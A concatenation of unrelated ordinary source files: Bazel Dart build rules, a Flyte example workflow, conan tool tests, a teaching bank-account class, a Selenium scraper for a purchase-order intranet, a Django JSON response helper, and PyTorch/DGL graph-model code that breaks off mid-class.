dc = _merge_dart_context(ctx_map[dc.package], dc)
ctx_map[dc.package] = dc
return ctx_map
def package_spec_action(ctx, dart_ctx, output):
"""Creates an action that generates a Dart package spec.
Arguments:
ctx: The rule context.
dart_ctx: The Dart context.
output: The output package_spec file.
"""
# There's a 1-to-many relationship between packages and targets, but
# collect_transitive_packages() asserts that their lib_roots are the same.
dart_ctxs = _collect_dart_context(dart_ctx,
transitive=True,
include_self=True).values()
# Generate the content.
content = "# Generated by Bazel\n"
for dc in dart_ctxs:
relative_lib_root = _relative_path(dart_ctx.label.package, dc.lib_root)
content += "%s:%s\n" % (dc.package, relative_lib_root)
# Emit the package spec.
ctx.actions.write(
output=output,
content=content,
)
def _relative_path(from_dir, to_path):
"""Returns the relative path from a directory to a path via the repo root."""
return "../" * (from_dir.count("/") + 1) + to_path
def layout_action(ctx, srcs, output_dir):
"""Generates a flattened directory of sources.
For each file f in srcs, a file is emitted at output_dir/f.short_path.
Returns a dict mapping short_path to the emitted file.
Args:
ctx: the build context.
srcs: the set of input srcs to be flattened.
output_dir: the full output directory path into which the files are emitted.
Returns:
A map from input file short_path to File in output_dir.
"""
commands = ["@echo off"]
output_files = {}
# TODO(cbracken) extract next two lines to func
if not output_dir.endswith("/"):
output_dir += "/"
for src_file in srcs:
dest_file = ctx.actions.declare_file(output_dir + src_file.short_path)
dest_dir = dest_file.path[:dest_file.path.rfind("/")]
link_target = _relative_path(dest_dir, src_file.path)
#commands += ["ln -s '%s' '%s'" % (link_target, dest_file.path)]
# Turns out "mklink.exe" does not function, but "mklink" does.
commands += ["mklink \"%s\" \"%s\"" % (dest_file.path.replace("/", "\\"), link_target.replace("/", "\\"))]
output_files[src_file.short_path] = dest_file
# Emit layout script.
layout_cmd = ctx.actions.declare_file(ctx.label.name + "_layout.cmd")
ctx.actions.write(
output=layout_cmd,
content="\n".join(commands),
is_executable=True,
)
# Invoke the layout action.
ctx.actions.run(
inputs=list(srcs),
outputs=output_files.values(),
executable=layout_cmd,
progress_message="Building flattened source layout for %s" % ctx,
mnemonic="DartLayout",
)
return output_files
|
"""
Hello World
------------
This simple workflow calls a task that returns "Hello World" and then just sets that as the final output of the workflow.
"""
import typing
# %%
# All imports at the root flytekit level are stable and we maintain backwards
# compatibility for them.
from flytekit import task, workflow
# %%
# Here we define a task called ``say_hello``. Note the @task decorator, Flyte
# uses this to understand that you intend to port this function to flyte.
# If you have normal functions in this file, they are not accessible to
# file, unless they have the @task decorator.
# You can change the signature of the task to take in an argument like this:
# def say_hello(name: str) -> str:
@task
def say_hello(name: str) -> str:
return f"hello world, {name}"
# %%
# Here we declare a workflow called ``my_wf``. Note the @workflow decorator,
# Flyte finds all workflows that you have declared by finding this decorator.
# A @workflow function, looks like a regular python function, except for some
# important differences, it is never executed by flyte-engine. It is like
# psuedo code, that is analyzed by flytekit to convert to Flyte's native
# Workflow representation. Thus the variables like return values from `tasks`
# are not real values, and trying to interact with them like regular variables
# will result in an error. For example, if a task returns a boolean, and if you
# try to test the truth value for this boolean, an error will be raised. The
# reason, is the tasks are not really executed by the function, but run remote
# and the return variables are supplied to subsequent tasks.
#
# You can treat the outputs of a task as you normally would a Python function. Assign the output to two variables
# and use them in subsequent tasks as normal. See :py:func:`flytekit.workflow`
# You can change the signature of the workflow to take in an argument like this:
# def my_wf(name: str) -> str:
@workflow
def my_wf(name: str) -> str:
res = say_hello(name=name)
return res
# %%
# Execute the Workflow, simply by invoking it like a function and passing in
# the necessary parameters
#
# .. note::
#
# One thing to remember, currently we only support ``Keyword arguments``. So
# every argument should be passed in the form ``arg=value``. Failure to do so
# will result in an error
if __name__ == "__main__":
print(f"Running my_wf(name='flo') {my_wf(name='flo')}")
# %%
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conan_clang_update.conan_clang_update import Command
import platform
def is_macos():
return 'Darwin' in platform.system()
def test_update_clang_remote_project():
""" Clone dummy project and update it.
"""
args = ['--remote', 'uilianries/conan-base64', '--skip-push']
command = Command()
command.run(args)
def test_update_clang_filter_branch():
""" Clone dummy project, filter by branch and update it.
"""
args = ['--remote', 'uilianries/conan-base64', '--skip-push', '--branch-pattern', 'testing/*']
command = Command()
command.run(args)
def test_update_clang_remote_user_branch_pattern():
""" Clone all projects, filter by branch and update it.
"""
# XXX (uilianries): There is some error to request Github API on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push', '--branch-pattern', 'testing/*']
command = Command()
command.run(args)
def test_update_clang_remote_user_project_pattern():
""" Clone only filtered projects and update it.
"""
# XXX (uilianries): There is some error to request Github API on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push', '--project-pattern', 'uilianries/conan-*']
command = Command()
command.run(args)
def test_update_clang_remote_user_project_branch_pattern():
""" Clone only filtered projects, filter by branch and update it.
"""
# XXX (uilianries): There is some error to request Github API on Mac jobs
if is_macos():
return
args = [
'--remote', 'uilianries', '--skip-push', '--project-pattern', 'uilianries/conan-*',
'--branch-pattern', 'testing/*'
]
command = Command()
command.run(args)
def test_update_clang_remote_user():
""" Clone all projects and update it.
"""
# XXX (uilianries): There is some error to request Github API on Mac jobs
if is_macos():
return
args = ['--remote', 'uilianries', '--skip-push']
command = Command()
command.run(args)
|
class Account:
"""
Account for a bank client.
"""
prefix = 'GIRO'
def __init__(self, newname, balance=0):
self.name = newname
self.balance = balance
def deposit(self, amt):
self.balance += amt
def withdraw(self, amt):
self.balance -= amt
def __str__(self):
return "{} | {:10s}:{:10.2f}".format(self.prefix, self.name, self.balance)
@staticmethod
def info_text():
"""Static methods belong to a class, but know nothing about it."""
return """This is a bank account. It keeps your money safe."""
@classmethod
def prefix_text(cls):
"""Class methods belong to a class, but know nothing about its instances."""
return """Bank account has the prefix: {}.""".format(cls.prefix)
if __name__ == '__main__':
a = Account('Adam', 100)
print(a)
a.deposit(50)
print(a)
a.withdraw(10)
print(a)
print(a.info_text())
print(a.prefix_text())
print(Account.info_text())
print(Account.prefix_text())
|
import datetime
import json
import os
import time
import sys
import pickle
import jsonpickle
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
from data.WebOrderLine import WebOrderLine
from tools.CNMWebOrdersScrapper import CNMWebOrdersScrapper
import pandas as pd
def main():
"""
Clase principal que ejecuta una serie de pasos con el objetivo de acceder y guardar (serializar, json y csv) todos los datos de las ordenes de compra
(del imb-cnm-csic) de un periodo de tiempo marcado por dos años (parámetros de entrada) dado un usuario y pass determinado.
Más tarde dicho csv puede ser importado por un programa de tratamiento de datos como excel y realizar filtros (p.e. por proveedor, etc...)
:return: None
"""
#fase de recuperacion de los argumentos pasados durante la llamada al main
argumentsList = sys.argv[1:]
login_url = argumentsList[0]
orders_url = argumentsList[1]
user = argumentsList[2]
password = argumentsList[3]
# primer año con registros en la web de compras del cnm
first_count_year = int(argumentsList[4])
from_year = int(argumentsList[5])
# correción from_year si es menor al primer año del cual se tienen registros en la web de compras del cnm
if from_year < first_count_year:
from_year = first_count_year
to_year = int(argumentsList[6])
# correción to_year si es mayor al año actual
if to_year > datetime.datetime.now().year:
to_year = datetime.datetime.now().year
savingFilePath = argumentsList[7]
# options en caso que queramos trabajar en silent mode, etc..
options = Options()
# options.add_argument('--headless')
# options.add_argument('--disable-gpu') # Last I checked this was necessary.
driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
# fase de creación del scrapper
cnmWebOrdersScrapper = CNMWebOrdersScrapper(driver,
login_url,
orders_url,
user,
password,
first_count_year,
from_year,
to_year)
# fase de login para entrar en la intranet del cnm
cnmWebOrdersScrapper.doLogin()
# fase de direccionamiento a una pagina determinada de la intranet del cnm
cnmWebOrdersScrapper.goToPage(orders_url)
webOrders = list()
# fase de obtención de todos los datos correspondientes a los pedidos hechos y registrados en la web del cnm para el usuario dado como parámetro de entrada
for y in range(from_year, to_year + 1):
# una vez en la página del listado de solicitudes de compra de la intranet del cnm nos dirigimos al listado del año y
cnmWebOrdersScrapper.goToPageOfYear(y)
# espera a la carga de la pagina
time.sleep(1)
# recopilación de los códigos de los pedidos hechos en ese año y. Son necesarios para el acceso a cada una de las ordenes de compra
yearOrdersList = cnmWebOrdersScrapper.getActualYearPage_OrdersList()
for code, usuario, fecha, centro_coste, vendedor, importe, estado in yearOrdersList:
# acceso a la orden de compra identificada por orderCode
cnmWebOrdersScrapper.goToOrderPage(code)
# espera a la carga de la pagina
time.sleep(2)
# recopilación de los datos de la orden de compra
webOrderData = cnmWebOrdersScrapper.getOrderData()
webOrderData.codigo = code
webOrderData.usuario = usuario
webOrderData.fecha = fecha
webOrderData.centro_coste = centro_coste
webOrderData.vendedor = vendedor
webOrderData.total = importe
webOrderData.status = estado
webOrders.append(webOrderData)
# fase de volcado de las ordenes de compra del listado webOrders a un fichero usando pickle
pickle_file = open(savingFilePath + '/cnmOrders.pickle', 'wb')
pickle.dump(webOrders, pickle_file)
# fase de volcado de las ordenes de compra del listado webOrders a un fichero de texto human-readable (json)
json_pickle_file = open(savingFilePath + '/cnmOrders.json', 'w')
json_pickle_file.write(jsonpickle.encode(webOrders, unpicklable=False))
# fase de volcado de las lineas de las ordenes de compra del listado webOrders a un fichero de texto human-readable (csv)
allWebOrders_Lines = list()
for webOrder in webOrders:
for webOrderLine in webOrder.lineas:
try:
webOrderLine.product.vendedor = webOrder.vendedor
webOrderLine.fechaCompra = webOrder.fecha # fecha en la que se da de alta una nueva solicitud de compra
# en el sistema de compras de administracion del cnm
except KeyError:
# es posible que no exista historico en pedidos (orders) cuyo estado sea diferente a 'Passada a comanda'.
# en estos casos no hacemos nada, simplemente mostrar un mensaje por pantalla y seguir con el proceso
print("Pedido sin historia. No es posible acceder a la fecha del pedido")
allWebOrders_Lines.append(webOrderLine)
#Transformación de todas las ordenes de compra a objeto json
wolsJSONData = json.dumps(allWebOrders_Lines, indent=4, cls=WebOrderLine.WebOrderLineEncoder)
print(wolsJSONData)
#transformacion de json a df de pandas (paso intermedio con el objetivo de usar pandas para guardar las ordenes de compra en formato csv)
df = pd.read_json(wolsJSONData)
#volcado de las ordenes de compra a csv
df.to_csv(savingFilePath + '/cnmOrders.csv', encoding='utf-8', index=False)
# fase de finalización
driver.close()
if __name__ == "__main__":
main()
|
"""
@author: liyao
@contact: liyao2598330@126.com
@software: pycharm
@time: 2020/3/30 11:41 下午
@desc:
"""
import json
import datetime
import functools
from django.http import HttpResponse
from echidna.settings import HttpResponseMessage
# Json 无法解析 datatime 类型的数据,构建 DateEncoder 类解决 datatime 解析问题
class DateEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.strftime("%Y-%m-%d %H:%M:%S")
else:
return json.JSONEncoder.default(self, obj)
# 利用偏函数重写 dumps 方法,使其支持解析 datatime 类型
json.dumps = functools.partial(json.dumps, cls=DateEncoder)
class CommonReturn(object):
"""
公共返回函数,封装了一个django HttpResponse 对象,自动把传入的参数转为json
"""
# 业务返回码
success = 0
failed = -1
# 默认http状态返回码
http_response_default_code = 200
http_response_success_code = 200
http_response_failed_code = 200
http_response_message = HttpResponseMessage()
def __call__(self, *args, **kwargs):
"""
:param response_code:
:param kwargs:
:return:
"""
return self.return_data(args, kwargs)
@staticmethod
def handle_data_type(args: (list, dict), kwargs: dict) -> None:
assert 'code' not in kwargs.keys() or 'code' in kwargs.keys() and \
isinstance(kwargs['code'], int), kwargs['code']
assert not args or isinstance(args[0], (list, dict)), args
def SUCCESS(self, *args: (dict, list), **kwargs) -> HttpResponse:
"""
Success message return format
if args exist,the parameters in kwargs will be overridden
>>> response = CommonReturn()
>>> response.SUCCESS(msg="hello world")
'<HttpResponse status_code=200, "application/json">'
>>> response.SUCCESS(msg="hello world").getvalue()
'b\'{"code": 0, "msg": "hello world"}\''
:param response_code: set http response code
:return:
"""
self.handle_data_type(args, kwargs)
code = kwargs['code'] if 'code' in kwargs.keys() else self.success
kwargs['response_code'] = kwargs['response_code'] if 'response_code' in kwargs.keys() else \
self.http_response_success_code
return self.return_data(args, kwargs, code=code)
def FAILED(self, *args: (dict, list), **kwargs) -> HttpResponse:
"""
Failure message return format
if args exist,the parameters in kwargs will be overridden
>>> response = CommonReturn()
>>> response.FAILED(msg="have some error")
'<HttpResponse status_code=500, "application/json">'
>>> response.FAILED(msg="have some error").getvalue()
'b\'{"code": -1, "msg": "have some error"}\''
:param response_code: set http response code
:return:
"""
self.handle_data_type(args, kwargs)
code = kwargs['code'] if 'code' in kwargs.keys() else self.failed
kwargs['response_code'] = kwargs['response_code'] if 'response_code' in kwargs.keys() else \
self.http_response_failed_code
return self.return_data(args, kwargs, code=code)
def return_data(self, args: tuple, kwargs: dict, code: int = None):
response = {}
response_code = self.http_response_default_code
for k in kwargs.keys():
if k == 'response_code':
assert isinstance(kwargs[k], int), kwargs[k]
response_code = kwargs[k]
http_response_message = self.http_response_message(code=response_code)
for key in ['msg', 'mood']:
if key not in kwargs.keys():
response[key] = http_response_message[key]
else:
response[k] = kwargs[k]
if not code and response_code != 200:
response['code'] = self.failed
else:
response['code'] = code if isinstance(code, int) else self.success
if args:
response = args[0]
try:
return HttpResponse(json.dumps(response, ensure_ascii=False), content_type="application/json, charset=utf-8",
status=response_code)
except UnicodeEncodeError:
return HttpResponse(json.dumps(response), content_type="application/json, charset=utf-8",
status=response_code)
|
import torch
from torch import distributions as D
import dgl
import numpy as np
class embedding(torch.nn.Module):
'''in_dim, out_dim'''
def __init__(self, in_dim, out_dim, in_num_channels):
super(embedding, self).__init__()
self.conv1d_1 = torch.nn.Conv1d(in_num_channels, 8, 3, stride=1, padding=1, padding_mode='replicate')
self.conv1d_2 = torch.nn.Conv1d(8, 32, 5, stride=1, padding=2, padding_mode='replicate')
self.conv1d_3 = torch.nn.Conv1d(32, 8, 7, stride=3, padding=3, padding_mode='replicate')
self.conv1d_4 = torch.nn.Conv1d(8, 1, 7, stride=3, padding=3, padding_mode='replicate')
self.hidden_dim = np.floor((in_dim+2)/3).astype(float)
self.hidden_dim = np.floor((self.hidden_dim+2)/3).astype(int)
self.fc1 = torch.nn.Linear(self.hidden_dim, out_dim, bias=True)
self.pool = torch.nn.MaxPool1d(3, stride=1, padding=1)
self.bn = torch.nn.BatchNorm1d(num_features=out_dim)
self.reset()
def reset(self):
gain = torch.nn.init.calculate_gain('leaky_relu', 0.2)
torch.nn.init.xavier_normal_(self.fc1.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_1.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_2.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_3.weight, gain=gain)
torch.nn.init.xavier_normal_(self.conv1d_4.weight, gain=gain)
def forward(self, h):
X = self.conv1d_1(h)
X = torch.nn.functional.leaky_relu(X)
X = self.conv1d_2(X)
X = torch.nn.functional.leaky_relu(X)
X = self.pool(X)
X = self.conv1d_3(X) # ceil( (Lin+2)/3 )
X = torch.nn.functional.leaky_relu(X)
X = self.conv1d_4(X) # ceil( (Lin+2)/3 )
X = torch.nn.functional.leaky_relu(X)
X = self.pool(X)
X = self.fc1(X)
X = torch.squeeze(X, dim=1)
X = self.bn(X)
return X
class encoder_chain(torch.nn.Module):
def __init__(self, in_dim, hidden_dim, out_dim, num_heads, etypes):
super(encoder_chain, self).__init__()
self.num_heads = num_heads
l1 = dict()
for et in etypes:
l1[et] = dgl.nn.GATConv( in_dim, hidden_dim,
num_heads=1, residual=False,
allow_zero_in_degree=True)
self.layer1 = dgl.nn.HeteroGraphConv( l1, aggregate = self.agg_func1)
l2 = dict()
for et in etypes:
l2[et] = dgl.nn.GATConv( hidden_dim, hidden_dim,
num_heads=1, residual=False,
allow_zero_in_degree=True)
self.layer2 = dgl.nn.HeteroGraphConv( l2, aggregate = self.agg_func2)
lMH = dict()
for et in etypes:
lMH[et] = dgl.nn.GATConv( hidden_dim, out_dim,
num_heads=num_heads, residual=False,
allow_zero_in_degree=True)
self.layerMHs = dgl.nn.HeteroGraphConv( lMH, aggregate=self.agg_funcMH)
self.fc1 = torch.nn.Linear(len(etypes)*hidden_dim, hidden_dim, bias=True)
self.fc2 = torch.nn.Linear(len(etypes)*hidden_dim, hidden_dim, bias=True)
# self.fc2 = torch.nn.Linear(len(etypes), len(etypes), bias=False)
self.fcmh = torch.nn.Linear(len(etypes), len(etypes), bias=False)
gain = torch.nn.init.calculate_gain('leaky_relu', 0.2)
torch.nn.init.xavier_uniform_(self.fc1.weight, gain=gain)
torch.nn.init.xavier_uniform_(self.fc2.weight, gain=gain)
torch.nn.init.xavier_uniform_(self.fcmh.weight, gain=gain)
def agg_func1(self, tensors, dsttype):
concated = torch.cat(tensors, dim=-1)
res = self.fc1(concated)
return res
def agg_func2(self, tensors, dsttype):
# stacked = torch.stack(tensors, dim=-1)
concated = torch.cat(tensors, dim=-1)
res = self.fc2(concated)
return res # torch.mean(res, dim=-1)
def agg_funcMH(self, tensors, dsttype):
stacked = torch.stack(tensors, dim=-1)
res = self.fcmh(stacked)
return torch.mean(res, dim=-1)
def norm_(self, x):
xp = torch.cat([torch.zeros((1,3), device=x.device), x[0:-1, :]], dim=0)
dx = x - xp
dx = torch.nan_to_num(dx, nan=0)
dmean = torch.median( torch.norm(dx, dim=-1))+1e-4
x = torch.cumsum(torch.div(dx, dmean)*1.0, dim=0)
return x
def forward(self, g, x, lr_ranges, etypes, ntype):
subg_interacts = g.edge_type_subgraph(etypes)
# sub_0 = g.edge_type_subgraph([etypes[0]])
# lr_ranges = torch.cat( ( 0.8*torch.ones((1), device=lr_ranges.device), lr_ranges.view(-1,),
# torch.tensor(float('inf'), device=lr_ranges.device).view(-1,) ),
# dim=0).float().to(lr_ranges.device)
h = self.layer1(subg_interacts, {ntype[0]: x })
h = torch.squeeze(h[ntype[0]], dim=1)
h = self.layer2(subg_interacts, {ntype[0]: h })
x = torch.squeeze(h[ntype[0]], dim=1)
h_res = x
h = self.layerMHs(subg_interacts, {ntype[0]: x })
res = list()
for i in torch.arange(self.num_heads):
x = h[ntype[0]][:,i,:]
x = self.norm_(x)
x = torch.nan_to_num(x, nan=0.0, posinf=100.0, neginf=-100.0)
# dist = torch.distributions.Normal(x, 0.1*torch.ones_like(x))
# x = dist.rsample()
res.append(x)
res = torch.stack(res, dim=1)
return res, h_res
class decoder_euclidean(torch.nn.Module):
def __init__(self):
super(decoder_euclidean, self).__init__()
def edge_distance(self, edges):
dist = torch.norm((edges.dst['h'] - edges.src['h']), dim=-1, keepdim=True)
return {'distance_score': dist}
def forward(self, graph, h, etype):
with graph.local_scope():
graph.ndata['h'] = h # assigns 'h' of all node types in one shot
graph.apply_edges(self.edge_distance, etype=etype)
return graph.edges[etype].data.pop('distance_score') # graph.edges[etype].data['dotproduct_score'],
class decoder_similarity(torch.nn.Module):
def __init__(self):
super(decoder_similarity, self).__init__()
# def edge_distance(self, edges):
# cos = torch.nn.CosineSimilarity(dim=-1, eps=1e-6)
# output = cos(edges.dst['h'], edges.src['h'])
# return {'cosine_score': output}
def forward(self, graph, h, etype):
with graph.local_scope():
graph.ndata['h'] = h # assigns 'h' of all node types in one shot
# graph.apply_edges(self.edge_distance, etype=etype)
graph.apply_edges(dgl.function.u_dot_v('h', 'h', 'similarity_score'), etype=etype)
res = graph.edges[etype].data.pop('similarity_score')
return res.clamp(min=-0.9)
class decoder_distance(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
# True: increasing, Flase: decreasing
super(decoder_distance, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
self.w = torch.nn.Parameter(torch.ones( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
# torch.nn.init.uniform_(self.w, a=-10.0, b=10.0)
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w.clamp(min=-3.0, max=3.0), dim=0)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
# std, mean = torch.std_mean(n2, dim=-1, unbiased=False, keepdim=False)
return {'dist_pred': dist}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred') #, g.edata.pop('std')
class decoder_gmm(torch.nn.Module):
def __init__(self, num_clusters):
super(decoder_gmm, self).__init__()
self.num_clusters = num_clusters
self.k = torch.nn.Parameter( torch.ones(self.num_clusters), requires_grad=True)
ms = torch.linspace(0, 4.0, steps=self.num_clusters, dtype=torch.float, requires_grad=True)
self.means = torch.nn.Parameter( ms, requires_grad=True)
self.distance_stdevs = torch.nn.Parameter( 0.3*torch.ones((self.num_clusters)), requires_grad=True)
inter = torch.linspace(start=0, end=0.1, steps=self.num_clusters)
self.interval = torch.nn.Parameter( inter, requires_grad=False)
self.cweight = torch.nn.Parameter( torch.zeros((self.num_clusters)), requires_grad=True)
self.bias = torch.nn.Parameter( torch.linspace(1e-8, 1e-5, steps=self.num_clusters, dtype=torch.float), requires_grad=False)
# gmm
def fc(self, stds_l, stds_r, k):
k = torch.sigmoid(k.clamp(min=-torch.log(torch.tensor(9.0)), max=9.0))
rate = torch.div(stds_l, stds_r)
kr = (k*rate).clamp(min=1e-8, max=0.9) # must < 1
return stds_l * torch.sqrt( -2.0*torch.log(kr) + 1e-8 )
def forward(self, distance):
cweight = torch.nn.functional.softmax(self.cweight.view(-1,), 0)
mix = D.Categorical(cweight)
stds = torch.relu(self.distance_stdevs) + 1e-3
d_left = self.fc(stds, stds, self.k)
d_left = torch.cumsum(d_left, dim=0)
d_right = self.fc(stds[0:-1], stds[1:], self.k[1:])
d_right = torch.cat( (torch.zeros(1, device=d_right.device), d_right), dim=0)
# d_right = torch.cumsum(d_right, dim=0)
means = (d_left + d_right)
means = (means + self.interval).clamp(max=5.0)
# activate = torch.nn.LeakyReLU(0.01)
# means = activate(self.means).clamp(max=4.5)
# means = torch.nan_to_num(means, nan=4.5)
# means = means + self.interval
# stds = torch.relu(self.distance_stdevs) + 1e-3
mode = torch.exp(means - stds**2)
_, idx = torch.sort(mode.view(-1,), dim=0, descending=False)
means = means[idx]
stds = stds[idx]
dis_cmp = D.Normal(means.view(-1,), stds.view(-1,))
dis_gmm = D.MixtureSameFamily(mix, dis_cmp)
data = torch.log(distance).view(-1,1)
unsafe_dis_cmpt_lp = dis_gmm.component_distribution.log_prob(data)
dis_cmpt_lp = torch.nan_to_num(unsafe_dis_cmpt_lp, nan=-float('inf'))
dis_cmpt_p = torch.exp(dis_cmpt_lp) * (dis_gmm.mixture_distribution.probs).view(1,-1) + self.bias
dis_cmpt_p = torch.nn.functional.normalize(dis_cmpt_p, p=1, dim=1)
dis_cmpt_lp = torch.log(dis_cmpt_p)
return [dis_cmpt_lp.float()], [dis_gmm]
def save_model_state_dict(models, optimizer, path, epoch=None, loss=None):
state_dict = {
'embedding_model_state_dict': models['embedding_model'].state_dict(),
'encoder_model_state_dict': models['encoder_model'].state_dict(),
'decoder_distance_model_state_dict': models['decoder_distance_model'].state_dict(),
'decoder_gmm_model_state_dict': models['decoder_gmm_model'].state_dict(),
'decoder_euclidean_model_state_dict': models['decoder_euclidean_model'].state_dict(),
'decoder_simlarity_model_state_dict': models['decoder_similarity_model'].state_dict(),
'optimizer_state_dict': optimizer.state_dict()
}
if epoch is not None:
state_dict['epoch'] = epoch
if loss is not None:
state_dict['nll_loss'] = loss
torch.save(state_dict, path)
def save_model_entire():
pass
"""
# for i, et in enumerate(etypes):
# x = self.layerConstruct(subg_interacts, x, [lr_ranges[i], lr_ranges[i+2]], et)
class ConstructLayer(torch.nn.Module):
def __init__(self):
super(ConstructLayer, self).__init__()
# src: h1 -> dst: h0
def edge_scale(self, edges):
d = edges.dst['z'] - edges.src['z']
z2 = torch.norm(d, dim=-1, keepdim=True) + 1e-5
clamp_d = torch.div(d, z2)*(z2.float().clamp(min=self.le, max=self.ge))
return {'e': clamp_d}
def message_func(self, edges):
return {'src_z': edges.src['z'], 'e': edges.data['e'], 'dst_z': edges.dst['z']}
def reduce_func(self, nodes):
h = torch.mean( nodes.mailbox['src_z'] + nodes.mailbox['e'], dim=1)
return {'ah': h}
def forward(self, graph, h, lr_ranges, etype):
self.le, self.ge = lr_ranges
with graph.local_scope():
graph.ndata['z'] = h
graph.apply_edges(self.edge_scale, etype=etype)
graph.update_all(self.message_func, self.reduce_func, etype=etype)
res = graph.ndata.pop('ah')
return res"""
"""class constrainLayer(torch.nn.Module):
def __init__(self, in_dim):
super(constrainLayer, self).__init__()
self.alpha_fc = torch.nn.Linear(in_dim, 1, bias=True)
self.beta_fc = torch.nn.Linear(in_dim, 1, bias=True)
gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.alpha_fc.weight, gain=gain)
torch.nn.init.xavier_normal_(self.beta_fc.weight, gain=gain)
def forward(self, g, h, r):
g.ndata['z'] = h
message_func = dgl.function.u_sub_v('z', 'z', 'm')
reduce_func = dgl.function.sum('m', 'h')
g.update_all(message_func, reduce_func)
h = g.ndata['h']
l = torch.norm(h, p=2, dim=-1, keepdim=True) + 1e-7
dh = (h/l) + 1e-4
'''ha = self.alpha_fc(h)
hb = self.beta_fc(h)
x = r * torch.sin(ha) * torch.cos(hb)
y = r * torch.sin(ha) * torch.sin(hb)
z = r * torch.cos(ha)
dh = torch.cat([x,y,z], dim=-1)'''
return dh
# return h"""
"""class encoder_bead(torch.nn.Module):
def __init__(self, in_dim, hidden_dim, out_dim):
super(encoder_bead, self).__init__()
'''self.layer1 = dgl.nn.GraphConv( in_dim, hidden_dim,
norm='none', weight=True,
allow_zero_in_degree=True)
self.layer2 = dgl.nn.GraphConv( hidden_dim, out_dim,
norm='none', weight=True,
allow_zero_in_degree=True)
self.layer3 = dgl.nn.GraphConv( out_dim, out_dim,
norm='none', weight=True,
allow_zero_in_degree=True)'''
self.layer1 = dgl.nn.SAGEConv( in_dim, hidden_dim, 'lstm',
norm=None)
self.layer2 = dgl.nn.SAGEConv( hidden_dim, out_dim, 'lstm',
norm=None)
self.layer3 = dgl.nn.SAGEConv( out_dim, out_dim, 'lstm',
norm=None)
self.norm = dgl.nn.EdgeWeightNorm(norm='both')
def forward(self, blocks, x, etypes, efeat):
edge_weights = [sub.edata[efeat[0]] for sub in blocks]
# norm_edge_weights = [ self.norm(blocks[i], w) for i, w in enumerate(edge_weights)]
num = x.shape[1]
res = []
for i in np.arange(num):
h = x[:,i,:]
block = blocks[0]
h = self.layer1(block, h, edge_weight=edge_weights[0])
block = blocks[1]
h = self.layer2(block, h, edge_weight=edge_weights[1])
block = blocks[2]
h = self.layer3(block, h, edge_weight=edge_weights[2])
res.append(h)
return torch.stack(res, dim=1)"""
"""class encoder_union(torch.nn.Module):
# src: center -> dst: bead
def __init__(self, in_h1_dim, in_h0_dim, out_dim, in_h1_heads, in_h0_heads, out_heads):
super(encoder_union, self).__init__()
self.layer_merge = dgl.nn.GATConv((in_h1_dim, in_h0_dim), out_dim,
num_heads=in_h0_heads,
allow_zero_in_degree=True)
self.in_h1_heads = in_h1_heads
self.wn_fc = torch.nn.utils.weight_norm( torch.nn.Linear(in_features=in_h0_heads*in_h1_heads, out_features=out_heads) )
gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.wn_fc.weight, gain=gain)
def normWeight(self, module): #
module.weight.data = torch.softmax(module.weight.data, dim=1)
def forward(self, graph, hier_1, hier_0):
res = []
for i in torch.arange(self.in_h1_heads):
k = self.layer_merge(graph, (hier_1[:,i,:], hier_0))
res.append(k)
res = torch.cat(res, dim=1)
res = torch.transpose(res, 1, 2)
self.normWeight(self.wn_fc)
res = self.wn_fc(res)
res = torch.transpose(res, 1, 2)
return res"""
"""class encoder_union(torch.nn.Module):
# src: center -> dst: bead
def __init__(self, in_h1_dim, in_h0_dim, out_dim, in_h1_heads, in_h0_heads, out_heads):
super(encoder_union, self).__init__()
'''self.layer_merge = dgl.nn.GATConv((in_h1_dim, in_h0_dim), out_dim,
num_heads=in_h0_heads,
allow_zero_in_degree=True)'''
self.layer_merge = MultiHeadMergeLayer(in_h0_dim, in_h1_dim, out_dim, in_h0_heads, merge='stack')
self.in_h1_heads = in_h1_heads
self.wn_fc = torch.nn.Linear(in_features=in_h0_heads*in_h1_heads, out_features=out_heads, bias=False)
gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.wn_fc.weight, gain=gain)
def normWeight(self, module): #
w = torch.relu(module.weight.data)
module.weight.data = w/(torch.sum(w, dim=0, keepdim=True))
def forward(self, graph, hier_1, hier_0):
res = []
for i in torch.arange(self.in_h1_heads):
k = self.layer_merge(graph, (hier_0, hier_1[:,i,:]))
# k = self.layer_merge(graph, (hier_1[:,i,:], hier_0))
res.append(k)
res = torch.cat(res, dim=2)
'''res = torch.cat(res, dim=1)
res = torch.transpose(res, 1, 2)'''
self.normWeight(self.wn_fc)
res = self.wn_fc(res)
res = torch.transpose(res, 1, 2)
return res"""
"""class MergeLayer(torch.nn.Module):
def __init__(self, in_h0_dim, in_h1_dim, out_dim):
super(MergeLayer, self).__init__()
# src: center h1 -> dst: bead h0
# self.fcsrc = torch.nn.Linear(in_h1_dim, out_dim, bias=False)
self.fcdst = torch.nn.Linear(in_h0_dim, out_dim, bias=False)
self.attn_interacts = torch.nn.Linear(2*out_dim, 1, bias=False)
self.reset_parameters()
def reset_parameters(self):
'''Reinitialize learnable parameters.'''
gain = torch.nn.init.calculate_gain('relu')
# torch.nn.init.xavier_normal_(self.fcsrc.weight, gain=gain)
torch.nn.init.xavier_normal_(self.fcdst.weight, gain=gain)
torch.nn.init.xavier_normal_(self.attn_interacts.weight, gain=gain)
